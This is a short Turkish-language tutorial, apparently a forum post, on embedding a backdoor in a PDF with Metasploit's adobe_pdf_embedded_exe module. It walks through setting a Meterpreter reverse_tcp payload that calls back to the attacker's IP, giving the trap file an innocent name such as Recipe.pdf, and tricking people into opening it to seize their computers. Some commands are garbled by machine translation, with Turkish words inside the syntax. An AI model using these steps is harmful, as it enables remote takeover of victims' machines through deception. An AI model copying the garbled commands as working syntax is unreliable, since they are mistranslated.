♨️PDF dosyasına arka kapı nasıl Gömülür♨️

Adım 1)Metasploit’i Çalıştırın

Adım2) Uygun İstismarı Bulun.

Bu komutu kullanarak Windows’ta adobe pdf için bir istismar için metasploits veritabanını arayacağım:

●Code:msf > search type:exploit platform:windows adobe pdf

“exploit/windows/fileformat/adobe_pdf_embedded_exe” istismarını görmelisiniz. kullanın:

●Kod:msf > exploit/windows/fileformat/adobe_pdf_embedded_exe’yi kullanın

Adım 3) Yükü Ayarlayın

Meterpreter yükünü tekrar kullanacağım, çünkü bu bizim için mevcut olan en güçlü veri yüklerinden biridir:

●Code:msf > exploit (adobe_pdf_embedded_exe) ) > yük pencerelerini/meterpreter/reverse_tcp’yi

ayarlayın Adım 4) Yararlanma seçeneklerini ayarlayın

İlk olarak, istismar için gerekli seçenekleri görüntüleyin:

●Code:msf > exploit (adobe_pdf_embedded_exe) > seçenekleri göster

Meterpreter yükünü gömmek için INFILENAME seçeneğine mevcut bir PDF dosyası sağlamamız gerektiğini görebilirsiniz. Ben buna “hemantexample.pdf” diyeceğim:

●Kod: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf

Sonraki seçenek çıktı dosyasının adı olan FILENAME’dir. Bunu, kullanıcıları açmaya çekecek masum bir şeyle değiştirin:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME Recipe.pdf

Son olarak, (saldırganların) IP adresimiz olan LHOST’u belirtmemiz gerekiyor. Benimki 192.168.1.8:

●Kod:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8 Adım5)

Exploit’i çalıştırın.

Artık tüm seçenekler ayarlandığına göre, exploit’i şu şekilde çalıştırabiliriz:

●Kod: msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit, Meterpeter dinleyicisini içeren Recipe.pdf adlı bir PDF oluşturdu. Şimdi, kullanıcıların pdf’yi (tekrar Sosyal Mühendislik) açmalarını sağlayın ve bilgisayarlarının kontrolünü anında bir gülümseme kadar kolay bir şekilde elde edeceksiniz 🙂